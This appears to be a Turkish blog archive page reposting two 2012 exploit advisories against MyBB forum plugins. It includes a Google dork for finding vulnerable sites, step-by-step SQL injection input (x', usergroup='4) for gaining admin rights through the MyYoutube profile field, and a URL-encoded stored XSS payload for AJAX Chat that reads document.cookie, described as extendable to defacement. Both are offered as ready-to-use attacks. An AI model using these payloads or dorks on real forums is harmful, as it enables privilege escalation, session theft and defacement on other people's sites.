Archive for 19 Aralık 2012

MyYoutube MyBB plugin SQL UPDATE injection

MyYoutube MyBB plugin SQL UPDATE injection açığı bulunmuş olup, açığın oluşumu ve açıkla ilgili source codeler aşağıdadır. Açık bulucunun açıkla ilgili anlatımları şu şekilde;



# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.





# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"





# Date: 12.10.2012





# Exploit Author: Zixem





# Vendor Homepage: http://www.mybb-es.com





# Software Link: http://mods.mybb.com/view/myyoutube





# Version: 1.0





# Tested on: Linux.





 





MyYoutube plugin suffers from POST SQL UPDATE injection.





 





The vulnerabillity exist within youtube.php :





<?php





 





$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/ 





 





function youtube_update($ytb) /*Line 128*/





 {





    global $mybb;





    if(isset($mybb->input['ytb']))





    {





        $ytb->user_update_data['ytb'] = $mybb->input['ytb'];





    }





}





 





?>





 





Insturctions:





(1) Go to usercp.php?action=profile





 





(2) http://i.imgur.com/gPYdq.png





Enter this in the youtube ID field(just like in the picture): x', usergroup='4





 





(3) Press on the update button.





 





(4) You're an admin now :3





 





 





If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.





 





PoC: 





before: http://i.imgur.com/aPFsz.png





While exploiting: http://i.imgur.com/gPYdq.png





Result: http://i.imgur.com/4ezpF.png





 





 





http://twitter.com/z1xem





 





-Zixem

MyBB AJAX Chat Persistent XSS Vulnerability

servercheckxss

MyBB AJAX Chat Persistent XSS açığı bulunmuş olup, açığın oluşumu ve kullanıyla ilgili açık bulucunun açıklamaları şu şekilde.


# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filter with the htmlentities function below.

<?php       $db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));<br ?="">
?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

<?php       $msg = urldecode($row["message"]);   ?>

The vulnerability can be exploited via the following line, decoded as - "><img alt="" src="XSS" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc, alert is just a basic example.

Brought to you be Mr. P-teo.

Twitter: http://twitter.com/MrPteo